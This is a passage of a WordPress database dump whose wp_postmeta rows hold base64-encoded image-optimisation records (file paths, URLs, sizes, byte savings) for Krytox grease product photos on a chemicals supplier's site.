ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0yMC1rZy00NC4xLWxiLVBhaWwtMzAwLWRwaS0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMjAta2ctNDQuMS1sYi1QYWlsLTMwMC1kcGktMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTIwLWtnLTQ0LjEtbGItUGFpbC0zMDAtZHBpLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3MDU0LCJpZCI6MzgxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0yMC1rZy00NC4xLWxiLVBhaWwtMzAwLWRwaS0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMjAta2ctNDQuMS1sYi1QYWlsLTMwMC1kcGktMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTIwLWtnLTQ0LjEtbGItUGFpbC0zMDAtZHBpLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3MDU2LCJpZCI6MzgxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0yMC1rZy00NC4xLWxiLVBhaWwtMzAwLWRwaS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMjAta2ctNDQuMS1sYi1QYWlsLTMwMC1kcGktMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTIwLWtnLTQ0LjEtbGItUGFpbC0zMDAtZHBpLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3MDU4LCJpZCI6MzgxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0yMC1rZy00NC4xLWxiLVBhaWwtMzAwLWRwaS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMjAta2ctNDQuMS1sYi1QYWlsLTMwMC1kcGktNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTIwLWtnLTQ0LjEtbGItUGFpbC0zMDAtZHBpLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3MDYxLCJpZCI6MzgxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0yMC1rZy00NC4xLWxiLVBhaWwtMzAwLWRwaS02MDB4NjAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMjAta2ctNDQuMS1sYi1QYWlsLTMwMC1kcGktNjAweDYwMC5qcGciLCJ3aWR0aCI6IjYwMCIsImhlaWdodCI6IjYwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTIwLWtnLTQ0LjEtbGItUGFpbC0zMDAtZHBpLTYwMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3MDYzLCJpZCI6MzgxfV0='); 
INSERT INTO `wp_postmeta` VALUES (30217, 380, 'wpfc_optimisation_reduction', '234611'); 
INSERT INTO `wp_postmeta` VALUES (30218, 380, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS04LW96LXR1YmUtMzAwLWRwaS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtOC1vei10dWJlLTMwMC1kcGkuanBnIiwid2lkdGgiOjE1MDAsImhlaWdodCI6MTUwMCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtOC1vei10dWJlLTMwMC1kcGkuanBnIiwicmVkdWN0aW9uIjoyMzQzNTgsInRpbWUiOjE0ODM1ODcwNzIsImlkIjoiMzgwIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTgtb3otdHViZS0zMDAtZHBpLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS04LW96LXR1YmUtMzAwLWRwaS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtOC1vei10dWJlLTMwMC1kcGktMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODcwNzQsImlkIjozODB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS04LW96LXR1YmUtMzAwLWRwaS04MDB4ODAwLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6ODAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtOC1vei10dWJlLTMwMC1kcGktODAweDgwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTgtb3otdHViZS0zMDAtZHBpLTgwMHg4MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3MDc2LCJpZCI6MzgwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtOC1vei10dWJlLTMwMC1kcGktNzY4eDc2OC5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjc2OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTgtb3otdHViZS0zMDAtZHBpLTc2OHg3NjguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS04LW96LXR1YmUtMzAwLWRwaS03Njh4NzY4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NzA3OSwiaWQiOjM4MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTgtb3otdHViZS0zMDAtZHBpLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS04LW96LXR1YmUtMzAwLWRwaS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtOC1vei10dWJlLTMwMC1kcGktMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODcwODEsImlkIjozODB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS04LW96LXR1YmUtMzAwLWRwaS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtOC1vei10dWJlLTMwMC1kcGktMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTgtb3otdHViZS0zMDAtZHBpLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3MDgzLCJpZCI6MzgwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtOC1vei10dWJlLTMwMC1kcGktMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTgtb3otdHViZS0zMDAtZHBpLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS04LW96LXR1YmUtMzAwLWRwaS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NzA4NSwiaWQiOjM4MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTgtb3otdHViZS0zMDAtZHBpLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS04LW96LXR1YmUtMzAwLWRwaS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtOC1vei10dWJlLTMwMC1kcGktNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODcwODgsImlkIjozODB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTgtb3otdHViZS0zMDAtZHBpLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS04LW96LXR1YmUtMzAwLWRwaS0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtOC1vei10dWJlLTMwMC1kcGktMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjE4NSwidGltZSI6MTQ4MzU4NzA5MCwiaWQiOjM4MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtOC1vei10dWJlLTMwMC1kcGktMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTgtb3otdHViZS0zMDAtZHBpLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS04LW96LXR1YmUtMzAwLWRwaS0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6NTcsInRpbWUiOjE0ODM1ODcwOTIsImlkIjozODB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTgtb3otdHViZS0zMDAtZHBpLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS04LW96LXR1YmUtMzAwLWRwaS0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtOC1vei10dWJlLTMwMC1kcGktMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODcwOTQsImlkIjozODB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTgtb3otdHViZS0zMDAtZHBpLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS04LW96LXR1YmUtMzAwLWRwaS0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtOC1vei10dWJlLTMwMC1kcGktMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODcwOTcsImlkIjozODB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTgtb3otdHViZS0zMDAtZHBpLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS04LW96LXR1YmUtMzAwLWRwaS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtOC1vei10dWJlLTMwMC1kcGktNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODcwOTksImlkIjozODB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTgtb3otdHViZS0zMDAtZHBpLTYwMHg2MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS04LW96LXR1YmUtMzAwLWRwaS02MDB4NjAwLmpwZyIsIndpZHRoIjoiNjAwIiwiaGVpZ2h0IjoiNjAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtOC1vei10dWJlLTMwMC1kcGktNjAweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODcxMDEsImlkIjozODB9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30219, 379, 'wpfc_optimisation_reduction', '446131'); 
INSERT INTO `wp_postmeta` VALUES (30220, 379, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS01LTctS2ctUGFpbC0zMDAtZHBpLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS01LTctS2ctUGFpbC0zMDAtZHBpLmpwZyIsIndpZHRoIjoxNTAwLCJoZWlnaHQiOjE1MDAsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTUtNy1LZy1QYWlsLTMwMC1kcGkuanBnIiwicmVkdWN0aW9uIjo0NDYxMTgsInRpbWUiOjE0ODM1ODcxMTAsImlkIjoiMzc5In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTUtNy1LZy1QYWlsLTMwMC1kcGktMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTUtNy1LZy1QYWlsLTMwMC1kcGktMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTUtNy1LZy1QYWlsLTMwMC1kcGktMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODcxMTMsImlkIjozNzl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS01LTctS2ctUGFpbC0zMDAtZHBpLTgwMHg4MDAuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo4MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS01LTctS2ctUGFpbC0zMDAtZHBpLTgwMHg4MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS01LTctS2ctUGFpbC0zMDAtZHBpLTgwMHg4MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3MTE2LCJpZCI6Mzc5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtNS03LUtnLVBhaWwtMzAwLWRwaS03Njh4NzY4LmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NzY4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtNS03LUtnLVBhaWwtMzAwLWRwaS03Njh4NzY4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtNS03LUtnLVBhaWwtMzAwLWRwaS03Njh4NzY4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4N